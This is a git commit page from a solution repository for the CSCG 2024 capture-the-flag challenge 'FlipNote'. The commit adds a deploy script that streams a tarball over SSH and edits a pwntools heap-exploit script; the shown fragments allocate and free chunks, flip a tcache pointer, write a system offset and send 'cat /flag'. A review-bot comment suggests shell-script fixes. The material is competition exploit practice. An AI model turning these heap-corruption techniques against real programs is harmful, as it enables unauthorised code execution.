cscg24-flipnote

CSCG 2024 Challenge 'FlipNote'
git clone https://git.sinitax.com/sinitax/cscg24-flipnote

commit 56ae4f33c8a4b9baf54e309528fc80f68f90350f
parent b662913587367b99eea9eda31e0b40d36d68bf3f
Author: Louis Burda <quent.burda@gmail.com>
Date:   Sun, 28 Apr 2024 03:29:51 +0200

Stash

Diffstat:
Msolve/.gitignore | 4++++
Asolve/deploy | 19+++++++++++++++++++
Msolve/solve | 19+------------------
3 files changed, 24 insertions(+), 18 deletions(-)

diff --git a/solve/.gitignore b/solve/.gitignore
@@ -1 +1,5 @@
 .gdb_history
+build
+dist
+send
+*.tar.xz
diff --git a/solve/deploy b/solve/deploy
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+if [ $# -lt 1 ]; then
+ echo "Usage: deploy SSH-CMD"
+ exit 1
+fi
+
+#rm -rf dist build
+#pyinstaller --collect-all pwnlib --collect-all pwntools solve
+#tar -czf solve.tar.xz dist/solve
+
+tar -czf solve.tar.xz send/get-pip.py send/build/
+cat solve.tar.xz | dd status=progress | base64 | $@ "rm -rf dist solve.tar.xz; base64 -d > solve.tar.xz && tar -xf solve.tar.xz"
+
+
+
+#id=1028371871728371098712983719820731
+#scp solve.tar.xz "root@sinitax.com:web/files/private/$id"
+#$@ "wget 'https://files.sinitax.com/private/$id' && tar -xf '$id'"
diff --git a/solve/solve b/solve/solve
@@ -106,12 +106,6 @@ if pwnlib.args.args.GDB:
 + ' -ex "target remote localhost:1025" -ex "b main" -ex "continue" -ex "b exit"'
 run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
-# increase input buf size
-# io.readuntil(b"> ")
-# largebin_size = heap_size(4)
-# io.sendline(b"Z" * heap_adj(largebin_size))
-# io.readuntil(b"> ")
-
 b = alloc(cc() * heap_adj(small_size))
 c = alloc(cc() * heap_adj(tcache_size))
 d = alloc(cc() * heap_adj(tcache_size))
@@ -137,9 +131,6 @@ free(a)
 free(c)
 flipv(c, 0, 0x800000)
-#flipv(c, 0, 0x000040)
-
-#list(map(free, spacing))
 c = alloc(cc() * heap_adj(tcache_size))
@@ -162,12 +153,4 @@ io.sendline(cc() * 0x18 + system_offset)
 io.sendline(b"cat /flag") # must be <= 0x11
 io.sendline(b"!"*0x81) # cause realloc
-#free(d) # to prevent issue with invalid reveal ptr in move#d chunk
-
-# edit(a, b"X"*0x8+win)
-
-if pwnlib.args.args.GDB:
- embed()
-
-io.sendline(b"")
-io.interactive()
+print(io.readall())
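Review bot: In the new `solve/deploy`, `$@` is expanded unquoted on the `cat solve.tar.xz | …` line, so an SSH command passed as several arguments is re-split and glob-expanded by the local shell before it runs; write `"$@"` there. The archive is created with `tar -czf` (gzip) but named `solve.tar.xz`, which only extracts cleanly if the remote `tar -xf` auto-detects compression; use `-cJf` or rename it to `.tar.gz`. There is no `set -e` or check on the `tar` exit status, so a failed archive step still streams whatever `solve.tar.xz` is on disk to the remote host. The commented-out upload block at the end also keeps a `root@` scp target and the `private/` path id in the repository; if that path is meant to be unguessable, reading it from the environment would keep it out of history.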